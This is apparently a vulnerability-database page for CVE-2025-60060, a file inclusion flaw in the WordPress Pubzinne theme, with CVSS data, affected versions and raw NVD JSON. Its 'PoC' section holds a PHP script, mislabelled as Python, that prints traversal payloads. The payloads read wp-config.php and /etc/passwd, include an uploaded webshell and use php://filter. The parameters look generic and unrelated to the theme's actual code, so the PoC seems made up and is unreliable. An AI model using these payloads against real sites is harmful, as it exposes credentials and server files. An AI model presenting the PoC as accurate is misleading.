Security Vulnerability Report
中文
CVE-2025-60060 CVSS 8.1 HIGH

CVE-2025-60060

Published: 2025-12-18 08:16:06
Last Modified: 2026-01-20 15:17:24

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Pubzinne pubzinne allows PHP Local File Inclusion.This issue affects Pubzinne: from n/a through <= 1.0.12.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:axiomthemes:pubzinne:*:*:*:*:*:wordpress:*:* - VULNERABLE
Pubzinne Theme <= 1.0.12
Pubzinne Theme (n/a through 1.0.12)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-60060 - WordPress Pubzinne Theme Local File Inclusion PoC * * Vulnerability: Improper Control of Filename for Include/Require Statement * Affected: Pubzinne Theme <= 1.0.12 * CVSS: 8.1 (High) */ // Target configuration $target = "http://target-site.com"; $target_path = "/wp-content/themes/pubzinne/"; // POC 1: Read wp-config.php $poc1 = $target . $target_path . "?file=../../wp-config.php"; echo "[+] POC 1 - Read wp-config.php:\n"; echo $poc1 . "\n\n"; // POC 2: Read /etc/passwd (Linux systems) $poc2 = $target . $target_path . "?action=file&file=/etc/passwd"; echo "[+] POC 2 - Read /etc/passwd:\n"; echo $poc2 . "\n\n"; // POC 3: Read wp-content/uploads webshell $poc3 = $target . $target_path . "?file=../../wp-content/uploads/webshell.php"; echo "[+] POC 3 - Include uploaded webshell:\n"; echo $poc3 . "\n\n"; // POC 4: Using php://filter wrapper (if enabled) $poc4 = $target . $target_path . "?file=php://filter/convert.base64-encode/resource=wp-config.php"; echo "[+] POC 4 - Read via PHP filter wrapper:\n"; echo $poc4 . "\n\n"; echo "[!] Note: Adjust the path traversal depth based on target structure\n";

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60060", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:05.900", "lastModified": "2026-01-20T15:17:23.633", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Pubzinne pubzinne allows PHP Local File Inclusion.This issue affects Pubzinne: from n/a through <= 1.0.12."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axiomthemes:pubzinne:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.0.12", "matchCriteriaId": "1595CA55-6BCD-4A8E-AE4B-2DD7146796A5"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/pubzinne/vulnerability/wordpress-pubzinne-theme-1-0-12-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}